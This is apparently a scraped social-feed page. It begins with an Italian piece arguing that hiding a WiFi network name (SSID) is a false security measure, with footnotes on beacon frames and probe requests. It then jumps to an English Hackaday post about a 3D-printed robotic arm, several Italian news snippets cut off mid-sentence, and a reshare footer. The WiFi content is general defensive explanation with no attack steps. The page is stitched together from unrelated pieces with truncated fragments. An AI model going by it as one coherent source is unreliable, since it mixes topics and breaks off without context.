Come mostrato nel video qui sopra, nascondere il nome della rete (SSID) non offre alcun reale vantaggio in termini di sicurezza. Anzi:
Gli hacker possono intercettare il nome della rete in pochi minuti, rendendo questa “protezione” del tutto illusoria.
Una rete nascosta può addirittura attirare più attenzione, perché una configurazione non standard può essere vista come un obiettivo potenzialmente interessante da esplorare.
Nascondere l’SSID non è una misura di sicurezza efficace: il nome della rete può essere facilmente rilevato anche con strumenti di base, rendendo questa pratica inutile contro qualsiasi attacco, anche non sofisticato.
Nei prossimi articoli affronteremo altri falsi miti, come:
“Se non faccio pagamenti o login, sono al sicuro”
“Non corro rischi se mi connetto solo a siti HTTPS”
“Il WiFi aperto è solo per i guest, quindi non ci sono rischi per l’azienda”
Continua a seguirci la nostra Rubrica WiFI per navigare informato, protetto e consapevole.
Beacon Frame Un beacon frame è un tipo di frame di gestione utilizzato nelle reti WLAN basate sullo standard IEEE 802.11. Contiene informazioni fondamentali sulla rete e viene trasmesso periodicamente per: – Annunciare la presenza di una rete wireless (WLAN); – Fornire un segnale di sincronizzazione ai dispositivi connessi, aiutandoli a mantenere la comunicazione allineata. Come Spiegato nell’articolo “Dentro le reti wireless-ieee-802-11: Architettura e Segnale WiFi” Nelle reti con infrastruttura (in modalità Infrastructure Basic Service Set, BSS), i beacon frame vengono inviati dall’access point (AP). Nelle reti ad hoc (o Independent BSS, IBSS), invece, la generazione dei beacon è distribuita tra i vari dispositivi partecipanti. NB: Dobbiamo sempre tenere presente gli effetti sull’ambiente radio. Nel caso della banda a 2,4 GHz, se si configurano più di 15 SSID su canali non sovrapposti (o più di 45 SSID in totale), i beacon frame iniziano a occupare una quantità significativa di tempo trasmissivo (air time). Questo fenomeno può degradare sensibilmente le prestazioni della rete, anche se la maggior parte delle reti è inattiva, poiché i beacon continuano comunque a essere trasmessi periodicamente. ↩︎
Probe Request: Una probe request è un messaggio inviato da un dispositivo client (come uno smartphone o un laptop) per cercare reti WiFi disponibili. Quando un dispositivo tenta di connettersi a una rete WiFi nascosta o salvata, invia probe request specifiche contenenti l’SSID della rete che sta cercando. Questi messaggi non sono cifrati, quindi possono essere intercettati facilmente da chiunque stia monitorando il traffico di rete.↩︎
[JesseDarr] recently wrote in to tell us about their dynamic Arm for Robitc Mischief (dARM), a mostly 3D printed six degrees of freedom (6DOF) robotic arm that’s designed to be stronger and more capable than what we’ve seen so far from the DIY community.
The secret? Rather than using servos, dARM uses brushless DC (BLDC) motors paired with ODrive S1 controllers. He credits [James Bruton] and [Skyentific] (two names which regular Hackaday readers are likely familiar with) for introducing him to not only the ODrive controllers, but the robotics applications for BLDCs in the first place.
dARM uses eight ODrive controllers on a CAN bus, which ultimately connect up to a Raspberry Pi 4B with a RS485 CAN Hat. The controllers are connected to each other in a daisy chain using basic twisted pair wire, which simplifies the construction and maintenance of the modular arm.
As for the motors themselves, the arm uses three different types depending on where they are located, with three Eaglepower 8308 units for primary actuators, a pair of GB36-2 motors in the forearm, and finally a GM5208-24 for the gripper. Together, [JesseDarr] says the motors and gearboxes are strong enough to lift a 5 pound (2.2 kilogram) payload when extended in a horizontal position.
The project’s documentation includes assembly instructions for the printed parts, a complete Bill of Materials, and guidance on how to get the software environment setup on the Raspberry Pi. It’s not exactly a step-by-step manual, but it looks like there’s more than enough information here for anyone who’s serious about building a dARM for themselves.
L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale La Commissione sta mettendo in campo le sue leggi digitali con una serie di casi che prendono di mira i colossi tecnologici statunitensi come Meta, Apple e X, facendo presagire la possibilità di
@Notizie dall'Italia e dal mondo Il 9 aprile comincerà uno sciopero di 36 ore appoggiato da movimenti sociali, organizzazioni dei diritti umani, partiti di opposizione, che si unirà alla protesta di pensionate e pensionati L'articolo ARGENTINA. Le lotte si uniscono e la
Jennà Romano – Trentatrè (Soundtrack) – film di Lorenzo Cammisa freezonemagazine.com/articoli/… Jennà Romano e la sua creatura, i Letti Sfatti (uno dei più azzeccati nomi del rock italiano) da oltre trent’anni spargono musica e poesia di bellezza e protesta dalla provincia napoletana ottenendo prestigiosi premi e alta considerazione dalla critica. Jennà, in carriera, ha nel suo book una ricca collaborazione con artisti di
Piero Bosio
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
reshared this
Informatica (Italy e non Italy 😁) e Cybersecurity & cyberwarfare reshared this.